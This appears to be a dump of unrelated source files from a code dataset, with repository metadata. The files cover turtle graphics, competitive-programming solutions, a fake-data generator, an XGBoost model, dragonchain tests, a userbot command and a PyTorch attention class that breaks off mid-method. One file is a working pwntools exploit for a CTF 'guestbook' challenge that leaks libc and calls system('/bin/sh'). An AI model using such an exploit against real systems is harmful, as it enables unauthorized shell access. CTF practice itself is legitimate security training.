seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
# Exercise 4.3
# 4.3.5
from math import *
from TurtleWorld import *

# A TurtleWorld must exist before a Turtle can be created, otherwise
# Turtle() raises an error.
world = TurtleWorld()
bob = Turtle()
# Speed things up by reducing the per-step drawing delay.
bob.delay = 0.1
def polygon(thing, lengthOfSide, numberOfSides):
    """Draw a regular polygon with the given turtle.

    thing -- the Turtle to draw with.  (Bug fix: the original rebound
             ``thing = Turtle()``, so the caller's turtle was ignored and
             a brand-new turtle was spawned on every call.)
    lengthOfSide -- length of each side.
    numberOfSides -- number of sides; the turtle turns
             360/numberOfSides degrees after each side, one full turn total.
    """
    for i in range(numberOfSides):
        fd(thing, lengthOfSide)
        lt(thing, 360 / numberOfSides)
def circle2(thing, radius):
    # Approximate a circle as a 40-sided regular polygon whose perimeter
    # equals the circumference 2*pi*radius.
    polygon(thing, (2*pi*radius/40), 40)
def arc(thing, radius, angle):
    """Draw an arc spanning ``angle`` degrees of a circle of ``radius``.

    Bug fix: the original delegated to polygon(), which always turns a
    full 360 degrees, so it drew a small closed polygon instead of an
    arc.  Here the arc length (angle/360)*2*pi*radius is split into n
    straight segments (the same segment length as before) and the turtle
    turns angle/n after each one, for a total turn of ``angle`` degrees.
    """
    n = 40
    segment = (angle / 360) * (2 * pi * radius) / n
    for i in range(n):
        fd(thing, segment)
        lt(thing, angle / n)
# Run: draw a 270-degree arc of radius 50 with bob.
arc(bob, 50, 270)
| okeonwuka/PycharmProjects | ThinkPython/swampy-2.1.5/myarc.py | myarc.py | py | 710 | python | en | code | 0 | github-code | 90 |
# Maximum Manhattan distance between any two of n points, via the
# 45-degree rotation z = x + y, w = x - y:
#   max |dx| + |dy|  =  max(max z - min z, max w - min w)
n = int(input())
INF = 10 ** 10
# Bug fix: zmax previously started at 0 (while wmax started at -10**10),
# which gives a wrong answer when every x + y is negative; all four
# extrema are now initialised symmetrically.
zmax = -INF
zmin = INF
wmax = -INF
wmin = INF
for _ in range(n):
    x, y = map(int, input().split())
    zref = x + y
    wref = x - y
    zmax = max(zmax, zref)
    zmin = min(zmin, zref)
    wmax = max(wmax, wref)
    wmin = min(wmin, wref)
ans = max(zmax - zmin, wmax - wmin)
print(ans)
43188100467 | import json
from fake_data_generator.columns_generator import get_columns_info_with_set_generators
from fake_data_generator.columns_generator.column import Column, MultipleColumns
from fake_data_generator.sources_formats.helper_functions import \
get_create_query, create_table_if_not_exists, execute_insertion
def generate_table_from_profile(conn,
                                dest_table_name_with_schema: str,
                                number_of_rows_to_insert: int,
                                source_table_profile_path: str = None,
                                columns_info=None,
                                batch_size=100):
    """Create (if needed) and populate a table with generated fake data.

    Column descriptions are merged from two sources:
      * a JSON profile file (``source_table_profile_path``), if given;
      * explicit ``columns_info`` entries (Column / MultipleColumns).
    Entries that carry their own generator are passed straight through;
    the remaining columns get generators derived from the merged profile.

    conn -- open DB connection used for the DDL and the inserts.
    dest_table_name_with_schema -- fully qualified destination table name.
    number_of_rows_to_insert -- total number of fake rows to insert.
    source_table_profile_path -- optional path to a JSON column profile.
    columns_info -- optional list of Column / MultipleColumns overrides.
    batch_size -- rows per insert batch.
    """
    rich_columns_info_dict = {}
    if source_table_profile_path is not None:
        with open(source_table_profile_path, 'r') as file:
            rich_columns_info_dict = json.load(file)
    columns_with_generators_as_parameter = []
    for column_info in columns_info or []:
        # isinstance() instead of ``type(x) == T`` so subclasses are honoured.
        if isinstance(column_info, MultipleColumns):
            for col_info in column_info.get_columns():
                rich_columns_info_dict.update(col_info.get_as_dict())
            columns_with_generators_as_parameter.append(column_info)
        elif isinstance(column_info, Column) and column_info.get_generator() is not None:
            columns_with_generators_as_parameter.append(column_info)
            rich_columns_info_dict.update(column_info.get_as_dict())
    create_table_if_not_exists(conn=conn,
                               dest_table_name_with_schema=dest_table_name_with_schema,
                               create_query=get_create_query(dest_table_name_with_schema, rich_columns_info_dict))
    columns_with_set_generators = get_columns_info_with_set_generators(rich_columns_info_dict, conn, dest_table_name_with_schema)
    execute_insertion(conn, dest_table_name_with_schema, number_of_rows_to_insert,
                      columns_with_set_generators + columns_with_generators_as_parameter, batch_size)
| maksimowich/fake_table_data_generator | fake_data_generator/sources_formats/generate_table_from_profile.py | generate_table_from_profile.py | py | 1,984 | python | en | code | 0 | github-code | 90 |
# Prompt for a word ("Masukkan kata" = "enter a word"); input() already
# returns str, so the str() wrapper and the trailing semicolon are redundant.
kata=str(input("Masukkan kata : "));
def hurufTengah(kata):
    """Return the middle letters of *kata* ("huruf tengah" = middle letters).

    A quarter-ish of the word is trimmed symmetrically from both ends:
      * even length, len/2 even  -> trim (len//2)//2 characters per side
      * even length, len/2 odd   -> trim (len//2)//2 + 1 per side
      * odd length               -> trim (len//2 + 1)//2 per side

    Fixes over the original:
      * removed the hard-coded special case for the literal word
        "Investing" (an input-specific hack) — it now follows the normal
        odd-length rule;
      * a trim of 0 used to produce ``kata[0:0] == ""`` (e.g. for a
        one-letter word, since -0 == 0 in a slice); the whole word is
        now returned instead.
    """
    half = len(kata) // 2
    if len(kata) % 2 == 0 and half % 2 == 0:
        trim = half // 2
    elif len(kata) % 2 == 0:
        trim = half // 2 + 1
    else:
        trim = (half + 1) // 2
    if trim == 0:
        return kata
    return kata[trim:-trim]
# Report the result (Indonesian: "the middle letters of <word> are <result>").
print("Huruf tengah pada kata",kata,"adalah",hurufTengah(kata));
| yogaagastyar00/UG11_E_71190444 | 2_E_71190444.py | 2_E_71190444.py | py | 528 | python | hu | code | 0 | github-code | 90 |
# Divisor enumeration
#############################################################
def make_divisors(n):
    """Return every positive divisor of n in ascending order.

    Walks d from 1 while d*d <= n; each divisor d found below sqrt(n)
    pairs with n // d above it, so both halves are collected in one pass.
    """
    small = []
    large = []
    d = 1
    while d * d <= n:
        if n % d == 0:
            small.append(d)
            if d * d != n:
                large.append(n // d)
        d += 1
    large.reverse()
    return small + large
#############################################################
#############################################################
N = int(input())
# Divisors of N
div1 = make_divisors(N)
# Divisors of N - 1
div2 = make_divisors(N - 1)
# Merge both lists; K = 1 never changes N, so drop it
div_set = set(div1 + div2)
div_set.remove(1)
# print(div_set)
# For each candidate K, simulate the process: naively doing N -> N - K is
# too slow, so instead divide out K while possible and then accept K iff
# the remainder is congruent to 1 mod K.
ans = 0
for div in div_set:
    tmp = N
    while tmp % div == 0:
        tmp = tmp // div
    if tmp % div == 1:
        ans += 1
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02722/s780574802.py | s780574802.py | py | 930 | python | ja | code | 0 | github-code | 90 |
import math , sys

# Count the elements of A that are divided by no *other* element of A
# (duplicated values disqualify each other).
N = int( input() )
A = list( map( int, input().split() ))
A.sort()
# Cs[v]: occurrence marker for value v (0 = absent, 1 = once, 2 = twice+)
Cs = [0 for _ in range(10**6+1)]
M = A[-1]
#print(A)
i=0
M = max(A)
for i in range(N):
    e = A[i]
    if Cs[e]==1:
        Cs[e]=2
    elif Cs[e]==0:
        Cs[e]=1
# Keep only values occurring exactly once (2 -> 0, 1 -> 1).
for i in range(len(Cs)):
    Cs[i] = Cs[i]%2
# Sieve out every proper multiple of each element.
for e in A:
    i = 2
    while e*i <= M:
        Cs[e*i] = 0
        i+=1
ans = sum(Cs)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02642/s682877940.py | s682877940.py | py | 401 | python | en | code | 0 | github-code | 90 |
from pwn import *
import time

# Exploit for the TUCTF "guestbook" challenge: leak libc addresses through
# an out-of-bounds entry index, then overwrite a stored pointer so that
# system("/bin/sh") is invoked.
local = 0
if local:
    #os.environ['LD_PRELOAD'] = './libc.so.6'
    r = process('./guestbook')
    e = ELF('./guestbook')
    libc = e.libc
else:
    r = remote('guestbook.tuctf.com', 4545)
    libc = ELF('./libc.so.6')
context.arch = 'i386'
#context.log_level = 'debug'
# Fill the four guestbook slots with filler entries.
r.sendlineafter('>>>', 'A'*0xf)
r.sendlineafter('>>>', 'A'*0xf)
r.sendlineafter('>>>', 'A'*0xf)
r.sendlineafter('>>>', 'A'*0xf)
# leak libc: view an entry at a huge index (0x40000006) so the read lands
# outside the table and returns library addresses
r.sendlineafter('>>', '1')
time.sleep(0.5)
r.recvuntil('\n')
r.sendlineafter('>>>', '1073741830')
time.sleep(0.5)
r.recv(0x14)
system = u32(r.recv(4))
dest = u32(r.recv(4))
libc_base = system - libc.symbols['system']
log.info('libc base: %#x' % libc_base)
log.info('dest: %#x' % dest)
# NOTE(review): .next() is Python 2 only; on Python 3 this would be next(...)
sh = libc.search('/bin/sh\x00').next() + libc_base
# rop: rewrite the same out-of-bounds entry with system() and its
# "/bin/sh" argument, then trigger it via menu option 3
r.sendline('2')
r.sendline('1073741830')
r.sendline('A'*48+p32(system)+'A'*4+p32(sh)+'\n')
r.sendline('3')
time.sleep(0.5)
r.clean()
r.interactive()
| Kyle-Kyle/Pwn | ctf/tuctf_2017/guestbook/writeup/solve.py | solve.py | py | 941 | python | en | code | 16 | github-code | 90 |
18582778069 | import numpy as np
def seachPrimeNum(N):
    """Return all primes in [2, N] by repeated trial filtering.

    The smallest remaining candidate is always prime; record it, filter
    out its multiples, and stop once the candidate exceeds sqrt(N) —
    every survivor at that point is prime.
    """
    limit = int(np.sqrt(N))
    candidates = list(range(2, N + 1))
    primes = []
    while candidates[0] <= limit:
        p = candidates[0]
        primes.append(p)
        candidates = [c for c in candidates if c % p != 0]
    return primes + candidates
#def numsearch(list):
#for i in list:
#print(i)
#if (i+1)/2 not in list:
#list.remove(i)
#return list
def main():
    # Answer Q range queries: how many primes p in [l, r] have (p+1)/2
    # also prime ("2017-like numbers").
    Q = int(input())
    # NOTE(review): "list" shadows the builtin; harmless here but worth renaming.
    list = seachPrimeNum(100000)
    # Flag arrays over the value range
    check = [0]*100001
    primeCheck = [0]*100001
    for i in list:
        primeCheck[i] = 1
    # Mark primes p (p != 2) whose (p + 1) / 2 is also prime.
    for i in list:
        if i == 2:
            continue
        tmp = int((i+1)/2)
        if primeCheck[tmp] == 1:
            check[i] = 1
    # Prefix sums so each query is answered in O(1)
    c = [0]*100001
    c[0] = 0
    for i in range(1,100001,1):
        #print(i)
        if check[i] == 1:
            c[i] = c[i-1]+1
        else:
            c[i] = c[i-1]
    #print(c)
    for i in range(Q):
        l,r = map(int,input().split())
        print(c[r]-c[l-1])
main()
| Aasthaengg/IBMdataset | Python_codes/p03476/s553281476.py | s553281476.py | py | 1,139 | python | en | code | 0 | github-code | 90 |
N, M = map(int, input().split())
# Each row: [prefecture P, year Y, original input position]
data = [list(map(int, input().split())) + [_] for _ in range(M)]
# Order cities by prefecture, then by founding year
data = sorted(data, key=lambda x: (x[0], x[1]))
order = 1
for i in range(M):
    # Restart the within-prefecture counter whenever the prefecture changes
    if not i == 0 and not data[i][0] == data[i-1][0]:
        order = 1
    # ID = 6-digit zero-padded prefecture number + 6-digit rank within it
    data[i].append(str(data[i][0]).zfill(6) + str(order).zfill(6))
    order += 1
# Restore original input order before printing the IDs
data = sorted(data, key=lambda x: (x[2]))
for x in data:
    print(x[3])
| Aasthaengg/IBMdataset | Python_codes/p03221/s368947926.py | s368947926.py | py | 404 | python | en | code | 0 | github-code | 90 |
import sys,math,collections,itertools
input = sys.stdin.readline

# Sum of (A_i XOR A_j) over all pairs i < j, modulo 1e9+7, computed bit by
# bit: bit k contributes 2^k once for every (one-bit, zero-bit) pair, i.e.
# cnt1 * (N - cnt1) times.
N = int(input())
A = list(map(int,input().split()))
m = 10**9+7
sumA = 0
for i in range(60):
    cnt1 = 0
    for a in A:
        if a>>i & 1:
            cnt1 += 1
    sumA += (cnt1*(N-cnt1)*2**i)%m
print(sumA%m)
| Aasthaengg/IBMdataset | Python_codes/p02838/s562929689.py | s562929689.py | py | 280 | python | en | code | 0 | github-code | 90 |
#!/usr/bin/env python3
from pprint import pprint
from collections import deque, defaultdict
import itertools
import math
import sys
sys.setrecursionlimit(10 ** 6)
input = sys.stdin.buffer.readline
INF = float('inf')

# Subtree-add queries on a tree rooted at vertex 0: each query (p, x)
# adds x to every vertex in p's subtree.
N, Q = map(int, input().split())
tree = [[] for _ in range(N)]
for _ in range(N-1):
    u, v = map(int, input().split())
    tree[u-1].append(v-1)
    tree[v-1].append(u-1)
# pprint(tree)
queries = []
for _ in range(Q):
    p, x = map(int, input().split())
    queries.append([p-1, x])
# Accumulate every operation on its target vertex first ...
counters = [0] * N
for p, x in queries:
    counters[p] += x
# print(counters)
# ... then push the totals down in a single DFS from the root: each
# vertex inherits its parent's accumulated value.  `dist` doubles as a
# visited marker (-1 = unvisited).
def dfs(dist, v):
    for v_adj in tree[v]:
        if dist[v_adj] == -1:
            dist[v_adj] = 1
            counters[v_adj] += counters[v]
            dfs(dist, v_adj)
dist = [-1] * N
dist[0] = 1
# print(counters)
dfs(dist, 0)
print(*counters)
| Aasthaengg/IBMdataset | Python_codes/p02936/s167826974.py | s167826974.py | py | 840 | python | en | code | 0 | github-code | 90 |
32124808189 | import itertools
from typing import Iterator
from linear_models.linear_circuit import LinearCircuit
from models.circuit import Circuit
from models.circuit_model import CircuitModel
from utils.graph_utils import enumerate_simple_acyclic_digraphs_adjacency_matrices
from utils.string_utils import enumerate_strings
def enumerate_circuits(
    circuit_model: CircuitModel,
    num_inputs: int,
    circuit_size: int,
) -> Iterator[Circuit]:
    """Yield every circuit of exactly ``circuit_size`` nodes over the model.

    Enumerates all simple acyclic digraphs with one sink and the required
    number of source nodes, crossed with every assignment of basis
    operators to the internal (non-source) nodes.
    """
    # Models with NOT-leaves expose each input twice (the input and its
    # negation), doubling the number of source nodes.
    num_sources = (
        num_inputs
        if not circuit_model.with_not_leaves
        else num_inputs * 2
    )
    # At least one internal node is needed on top of the sources.
    if circuit_size < num_sources + 1:
        return
    for adjacency_matrix in enumerate_simple_acyclic_digraphs_adjacency_matrices(
        size=circuit_size,
        sources=num_sources,
        sinks=1,
        fan_in=circuit_model.fan_in,
    ):
        for bit_string in enumerate_strings(
            alphabet=set(range(len(circuit_model.basis))),
            size=circuit_size - num_sources,
        ):
            # Source nodes carry a dummy operator 0; internal nodes get
            # the enumerated basis-operator indices.
            yield Circuit(
                num_inputs=num_inputs,
                adjacency_matrix=adjacency_matrix,
                node_operators=([0] * num_sources) + [int(bit) for bit in bit_string],
                model=circuit_model,
            )
def enumerate_linear_circuits(
    num_inputs: int,
    num_outputs: int,
    circuit_size: int,
) -> Iterator[LinearCircuit]:
    """Yield every linear circuit of exactly ``circuit_size`` nodes (fan-in 2).

    For each admissible acyclic digraph, all assignments of output wires to
    nodes are collected (-1 apparently meaning an unattached output — TODO
    confirm against LinearCircuit); whenever the circuit has internal
    nodes, the last node must appear among the outputs so that no dead top
    node is enumerated.
    """
    if circuit_size < num_inputs:
        return
    for adjacency_matrix in enumerate_simple_acyclic_digraphs_adjacency_matrices(
        size=circuit_size,
        sources=num_inputs,
        sinks=min(num_outputs, circuit_size - num_inputs),
        fan_in=2,
    ):
        possible_output_nodes = [
            output_nodes
            for output_nodes in itertools.product(range(-1, circuit_size), repeat=num_outputs)
            if circuit_size <= num_inputs or circuit_size - 1 in output_nodes
        ]
        yield LinearCircuit(
            num_inputs=num_inputs,
            possible_output_nodes=possible_output_nodes,
            adjacency_matrix=adjacency_matrix,
        )
| udragon/circuit-complexity | circuit_enumeration.py | circuit_enumeration.py | py | 2,112 | python | en | code | 0 | github-code | 90 |
24623275291 | import unittest
from unittest.mock import patch, MagicMock
from dragonchain import test_env # noqa: F401
from dragonchain import exceptions
from dragonchain.webserver.lib import transactions
class TestQueryTransactions(unittest.TestCase):
    """Tests for transactions.query_transactions_v1."""

    @patch("dragonchain.lib.database.redisearch.search")
    def test_query_transactions_calls_search(self, mock_get_txn):
        # The transaction type is used as the redisearch index name.
        transactions.query_transactions_v1({"transaction_type": "banana", "q": "*"}, False)
        mock_get_txn.assert_called_with(
            index="banana", limit=None, offset=None, only_id=None, query_str="*", sort_asc=None, sort_by=None, verbatim=None
        )

    @patch("dragonchain.webserver.lib.transactions.storage.select_transaction", return_value="a txn")
    @patch(
        "dragonchain.webserver.lib.transactions.redisearch.search", return_value=MagicMock(docs=[MagicMock(id="fake", block_id="banana")], total=4)
    )
    def test_query_transactions_returns_search_result(self, mock_search, mock_select):
        # Each search hit is resolved to its stored transaction body.
        response = transactions.query_transactions_v1({"transaction_type": "banana", "q": "query"}, False)
        self.assertEqual(response, {"total": 4, "results": ["a txn"]})
        mock_search.assert_called_once()
        mock_select.assert_called_once()
class TestGetTransactions(unittest.TestCase):
    """Tests for transactions.get_transaction_v1."""

    @patch("dragonchain.lib.database.redis.sismember_sync", return_value=True)
    def test_get_transaction_v1_returns_stub(self, mock_sismember):
        # Transactions still queued (not yet in a block) return a pending stub.
        result = transactions.get_transaction_v1("banana", True)
        self.assertEqual(
            result, {"header": {"txn_id": "banana"}, "status": "pending", "message": "This transaction is waiting to be included in a block"}
        )

    @patch("dragonchain.lib.database.redis.sismember_sync", return_value=False)
    @patch("dragonchain.lib.database.redisearch.search", return_value=MagicMock(block_id="banana"))
    @patch("dragonchain.lib.interfaces.storage.select_transaction", return_value={"payload": '{"banana":4}'})
    def test_get_transaction_v1_returns_parsed(self, mock_sismember, mock_search, mock_select_txn):
        # With the parse flag set, the stored JSON payload comes back deserialized.
        result = transactions.get_transaction_v1("banana", True)
        self.assertEqual(result["payload"], {"banana": 4})
class TestSubmitTransactions(unittest.TestCase):
    """Tests for transactions.submit_transaction_v1 / submit_bulk_transaction_v1."""

    @patch("dragonchain.webserver.lib.transactions._generate_transaction_model")
    @patch("dragonchain.webserver.lib.transactions.queue")
    def test_submit_transaction_checks_if_key_is_allowed(self, mock_queue, mock_gen_model):
        mock_key = MagicMock()
        mock_key.is_key_allowed.return_value = True
        transactions.submit_transaction_v1({}, None, api_key=mock_key)
        mock_key.is_key_allowed.assert_called_once()
        # A disallowed key must raise ActionForbidden instead of queueing.
        mock_key.is_key_allowed.return_value = False
        self.assertRaises(exceptions.ActionForbidden, transactions.submit_transaction_v1, {}, None, api_key=mock_key)

    @patch("dragonchain.webserver.lib.transactions._generate_transaction_model")
    @patch("dragonchain.webserver.lib.transactions.queue")
    @patch("dragonchain.webserver.lib.transactions.dc_redis")
    def test_submit_transaction_bulk_checks_if_key_is_allowed(self, mock_queue, mock_gen_model, mock_redis):
        mock_key = MagicMock()
        mock_key.is_key_allowed.return_value = True
        transactions.submit_bulk_transaction_v1([{"txn_type": "whatever"}], api_key=mock_key)
        mock_key.is_key_allowed.assert_called_once()
        # Bulk submission performs the same permission check.
        mock_key.is_key_allowed.return_value = False
        self.assertRaises(exceptions.ActionForbidden, transactions.submit_bulk_transaction_v1, [{"txn_type": "whatever"}], api_key=mock_key)
| dragonchain/dragonchain | dragonchain/webserver/lib/transactions_utest.py | transactions_utest.py | py | 3,601 | python | en | code | 701 | github-code | 90 |
# load packages
import numpy as np
import pandas as pd
from sklearn.cross_validation import KFold
import xgboost as xgb
import warnings
warnings.filterwarnings("ignore")

# load data (BlogFeedback dataset, headerless CSVs)
train = pd.read_csv("../Data/blogData_train.csv",header=None)
test = pd.read_csv("../Data/blogData_test.csv",header=None)
# rename: features V1..V280, target column (index 281) is y
names = ["V%i" % i if i != 281 else "y" for i in range(1,282)]
train.columns = names
test.columns = names
# split into features and target variables
X_train = train.ix[:,"V1":"V280"]
y_train = train["y"]
X_test = test.ix[:,"V1":"V280"]
y_test = test["y"]
# log1p-transform the heavy-tailed target
y_train_log = np.log(train["y"]+1)
y_test_log = np.log(test["y"]+1)
# Loss evaluation function
def eva(test_pred, test_real):
    """Mean squared error between predictions and ground truth."""
    residual = test_real - test_pred
    return (residual ** 2).mean()
# Feature Engineering
# Define group: the 17 feature families of the BlogFeedback columns
# V1..V280 (comment/link statistics, time features, bag-of-words
# V63..V262, weekday indicators, parent features).
group = [[1,6,11,16,21],
         [2,7,12,17,22],
         [3,8,13,18,23],
         [4,9,14,19,24],
         [5,10,15,20,25],
         [26,31,36,41,46],
         [27,32,37,42,47],
         [28,33,38,43,48],
         [29,34,39,44,49],
         [30,35,40,45,50],
         [51,52,53,54,55],
         [56,57,58,59,60],
         [61,62],
         list(range(63,263)),
         [263,264,265,266,267,268,269],
         [270,271,272,273,274,275,276],
         [277,278,279,280]]
# Drop features: remove the listed families wholesale from both splits
drop_group = [5,7,6,9,1,2,8,13]
remove_col = []
for i in drop_group:
    remove_col += group[i]
remove_col = ['V'+str(x) for x in remove_col]
newXTrain = X_train.drop(remove_col, axis=1)
newXTest = X_test.drop(remove_col, axis=1)
# Generating new features
# N1 (= V52/V51) was evaluated but not selected, so it is not created.
# Ratio features between raw count columns.  Each entry is
# (new_column, numerator, denominator); the order matches the original
# script so downstream column order is unchanged.
# NOTE: N10 duplicates N8 (both V59/V56) — kept for backward compatibility.
# (.values replaces the deprecated .as_matrix(); identical result.)
ratio_features = [
    ("N2", "V53", "V51"),
    ("N3", "V54", "V51"),
    ("N4", "V53", "V52"),
    ("N5", "V52", "V54"),
    ("N6", "V57", "V56"),
    ("N7", "V58", "V56"),
    ("N8", "V59", "V56"),
    ("N9", "V57", "V58"),
    ("N10", "V59", "V56"),
]
for name, num, den in ratio_features:
    newXTrain[name] = newXTrain[num].values / newXTrain[den].values
    newXTest[name] = newXTest[num].values / newXTest[den].values
# Binning V61: flag rows where V61 exceeds 24
newXTrain["N11"] = (newXTrain["V61"].values > 24) * 1
newXTest["N11"] = (newXTest["V61"].values > 24) * 1
# V62/V61
newXTrain["N12"] = newXTrain["V62"].values / newXTrain["V61"].values
newXTest["N12"] = newXTest["V62"].values / newXTest["V61"].values
# Binary flag: 1 if the publication day falls on a weekend
# (sum of the two weekend indicator columns V268-V269), else 0
pubWeekendTrain = newXTrain.ix[:,"V268":"V269"].apply(lambda x:x.sum(),axis = 1)
pubWeekendTest = newXTest.ix[:,"V268":"V269"].apply(lambda x:x.sum(),axis = 1)
# Binary flag: 1 if the basetime day falls on a weekend (V275-V276), else 0
bsWeekendTrain = newXTrain.ix[:,"V275":"V276"].apply(lambda x:x.sum(),axis = 1)
bsWeekendTest = newXTest.ix[:,"V275":"V276"].apply(lambda x:x.sum(),axis = 1)
# Combine the two flags into one dataframe
pubBsDayTrain = pd.concat([pubWeekendTrain,bsWeekendTrain],axis=1)
pubBsDayTest = pd.concat([pubWeekendTest,bsWeekendTest],axis=1)
# One-hot encode the four (pubWeekend, bsWeekend) patterns:
# (1,1)->N13, (1,0)->N14, (0,1)->N15, (0,0)->N16
N13_train = pubBsDayTrain.apply(lambda x: ((x[0]==1) & (x[1]==1))*1, axis=1)
N14_train = pubBsDayTrain.apply(lambda x: ((x[0]==1) & (x[1]==0))*1, axis=1)
N15_train = pubBsDayTrain.apply(lambda x: ((x[0]==0) & (x[1]==1))*1, axis=1)
N16_train = pubBsDayTrain.apply(lambda x: ((x[0]==0) & (x[1]==0))*1, axis=1)
N13_test = pubBsDayTest.apply(lambda x: ((x[0]==1) & (x[1]==1))*1, axis=1)
N14_test = pubBsDayTest.apply(lambda x: ((x[0]==1) & (x[1]==0))*1, axis=1)
N15_test = pubBsDayTest.apply(lambda x: ((x[0]==0) & (x[1]==1))*1, axis=1)
N16_test = pubBsDayTest.apply(lambda x: ((x[0]==0) & (x[1]==0))*1, axis=1)
# Adding new variables
newXTrain["N13"] = N13_train
newXTest["N13"] = N13_test
newXTrain["N14"] = N14_train
newXTest["N14"] = N14_test
newXTrain["N15"] = N15_train
newXTest["N15"] = N15_test
newXTrain["N16"] = N16_train
newXTest["N16"] = N16_test
# Replace the NaN / inf values produced during feature creation
# (0/0 and x/0 in the ratio features) with sentinel values
newXTrain = newXTrain.fillna(-1)
newXTest = newXTest.fillna(-1)
newXTrain = newXTrain.replace([np.inf, -np.inf], 10000)
newXTest = newXTest.replace([np.inf, -np.inf], 10000)
# Create interaction features from add_interaction.txt; each line holds
# the underscore-joined names of the columns to multiply
# (e.g. "V51_V56" -> product of columns V51 and V56).
f = open("../Data/add_interaction.txt", "r")
for inter_var in f.readlines():
    inter_var = inter_var.strip()
    # The joined name doubles as the new column name
    new_col_name = inter_var
    inter_var = inter_var.split('_')
    # add new column for train data
    X_train_new_col =newXTrain[inter_var[0]]
    for var in inter_var[1:]:
        X_train_new_col = X_train_new_col * newXTrain[var]
    newXTrain[new_col_name] = X_train_new_col
    # add new column for test data
    X_test_new_col = newXTest[inter_var[0]]
    for var in inter_var[1:]:
        X_test_new_col = X_test_new_col * newXTest[var]
    newXTest[new_col_name] = X_test_new_col
f.close()
# Ensemble model
# Create cv-folds: train one XGBoost model per fold (validating on the
# held-out fold for early stopping) and average the test predictions.
nfolds = 8
folds = KFold(len(y_train_log), n_folds = nfolds, shuffle = True, random_state = 42)
model_group = []
pred = []
i = 1
# Train and ensemble the models
for (Tr, Te) in folds:
    train_x = newXTrain.ix[Tr,:]
    train_y = y_train_log[Tr]
    test_x = newXTrain.ix[Te,:]
    test_y = y_train_log[Te]
    # parameter settings
    params = {
        'min_child_weight': 1,
        'eta': 0.01,
        'colsample_bytree': 1,
        'max_depth': 12,
        'subsample': 0.2,
        'reg_alpha': 1,
        'gamma': 0.04,
        'silent':True,
        "eval_metric":"rmse"}
    # model training on 7 sections, evaluating on the held-out section
    xgtrain = xgb.DMatrix(train_x, label=train_y)
    xgtest = xgb.DMatrix(newXTest)
    xgval = xgb.DMatrix(test_x, label=test_y)
    print("The model %s is training......" % i)
    gb_model = xgb.train(params,
                         dtrain=xgtrain,
                         verbose_eval = 50,
                         evals=[(xgval,"validation")],
                         early_stopping_rounds = 30,
                         num_boost_round = 2000)
    # model prediction on the external test set
    gb_pred = gb_model.predict(xgtest)
    # store the predicted results and the model for each fold
    pred.append(gb_pred)
    model_group.append(gb_model)
    i += 1
# Average the fold predictions and report the final loss
# (MSE on the log1p scale, via eva)
gb_pred = np.array(pred).mean(0)
print("The final loss value from the ensemble model is: ", eva(gb_pred,y_test_log))
| hncpr1992/BlogFeedBackProject | Code/ModelTraining.py | ModelTraining.py | py | 8,061 | python | en | code | 1 | github-code | 90 |
75117589416 | from telethon import events
from ubi import u
import re
from ubi.modules.strings import KILL_CODE
@u.on(events.NewMessage(pattern=re.compile(r"\.die (.*)")))
async def _(event):
    """Handle `.die <code>`: disconnect the userbot when the kill code matches."""
    # Ignore forwarded messages.
    if event.fwd_from:
        return
    killcode = event.pattern_match.group(1)
    print(killcode)
    if killcode == KILL_CODE:
        await event.reply("Valid Killcode Entered ... \nDisconnecting ! 💀")
        await u.disconnect()
    else:
        await event.reply("Kill Code Invalid ... \n")
| RobiMez/Bori | ubi/modules/die.py | die.py | py | 486 | python | en | code | 1 | github-code | 90 |
24808382261 | from typing import Tuple, Optional
import torch
from torch import Tensor
from packaging import version
if version.parse(torch.__version__) < version.parse('1.9'):
from torch.nn.modules.linear import _LinearWithBias
else:
from torch.nn.modules.linear import NonDynamicallyQuantizableLinear
from torch.nn.init import xavier_uniform_
from torch.nn.init import constant_
from torch.nn.init import xavier_normal_
from torch.nn.parameter import Parameter
from torch.nn import Module
import torch.nn.functional as F
from torch.overrides import (
has_torch_function, handle_torch_function)
class MultiheadAttention(Module):
    """Multi-head attention (vendored from ``torch.nn.MultiheadAttention``).

    Projects query/key/value, runs ``num_heads`` scaled dot-product
    attention heads in parallel, and combines the heads through a final
    output projection.
    """
    bias_k: Optional[torch.Tensor]
    bias_v: Optional[torch.Tensor]

    def __init__(self, embed_dim, num_heads, dropout=0., bias=True, add_bias_kv=False, add_zero_attn=False, kdim=None, vdim=None):
        super(MultiheadAttention, self).__init__()
        self.embed_dim = embed_dim
        self.kdim = kdim if kdim is not None else embed_dim
        self.vdim = vdim if vdim is not None else embed_dim
        # When the key/value dims differ from embed_dim, separate q/k/v
        # projection weights are used instead of one packed in_proj_weight.
        self._qkv_same_embed_dim = self.kdim == embed_dim and self.vdim == embed_dim
        self.num_heads = num_heads
        self.dropout = dropout
        self.head_dim = embed_dim // num_heads
        assert self.head_dim * num_heads == self.embed_dim, "embed_dim must be divisible by num_heads"
        if self._qkv_same_embed_dim is False:
            self.q_proj_weight = Parameter(torch.Tensor(embed_dim, embed_dim))
            self.k_proj_weight = Parameter(torch.Tensor(embed_dim, self.kdim))
            self.v_proj_weight = Parameter(torch.Tensor(embed_dim, self.vdim))
            self.register_parameter('in_proj_weight', None)
        else:
            self.in_proj_weight = Parameter(torch.empty(3 * embed_dim, embed_dim))
            self.register_parameter('q_proj_weight', None)
            self.register_parameter('k_proj_weight', None)
            self.register_parameter('v_proj_weight', None)
        if bias:
            self.in_proj_bias = Parameter(torch.empty(3 * embed_dim))
        else:
            self.register_parameter('in_proj_bias', None)
        # The output-projection class was renamed in torch 1.9 (see the
        # version-gated imports at the top of this module).
        if version.parse(torch.__version__) < version.parse('1.9'):
            self.out_proj = _LinearWithBias(embed_dim, embed_dim)
        else:
            self.out_proj = NonDynamicallyQuantizableLinear(embed_dim, embed_dim)
        if add_bias_kv:
            self.bias_k = Parameter(torch.empty(1, 1, embed_dim))
            self.bias_v = Parameter(torch.empty(1, 1, embed_dim))
        else:
            self.bias_k = self.bias_v = None
        self.add_zero_attn = add_zero_attn
        self._reset_parameters()

    def _reset_parameters(self):
        # Xavier init for the projection weights, zeros for the biases.
        if self._qkv_same_embed_dim:
            xavier_uniform_(self.in_proj_weight)
        else:
            xavier_uniform_(self.q_proj_weight)
